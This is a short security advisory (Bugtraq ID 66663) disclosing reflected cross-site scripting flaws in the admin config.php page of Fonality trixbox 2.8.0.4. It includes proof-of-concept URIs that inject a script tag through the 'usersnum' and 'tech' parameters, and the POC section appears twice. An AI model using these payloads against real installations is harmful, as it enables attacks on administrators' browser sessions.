Trixbox 'config.php' Multiple Cross Site Scripting Vulnerabilities
BID:66663
Info
Trixbox 'config.php' Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 66663 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 07 2014 12:00AM |
| Updated: | Apr 07 2014 12:00AM |
| Credit: | W1ckerMan |
| Vulnerable: |
Fonality trixbox 2.8.0.4 |
| Not Vulnerable: | |
Exploit / POC
Trixbox 'config.php' Multiple Cross Site Scripting Vulnerabilities
To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URI is available:
http://www.example.com/admin/config.php?display=recordings&usersnum=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
http://www.example.com/admin/config.php?display=trunks&tech=%22%3E%3Cscript%3Ealert%28%22123%22%29%3C/script%3E
To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URI is available:
http://www.example.com/admin/config.php?display=recordings&usersnum=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
http://www.example.com/admin/config.php?display=trunks&tech=%22%3E%3Cscript%3Ealert%28%22123%22%29%3C/script%3E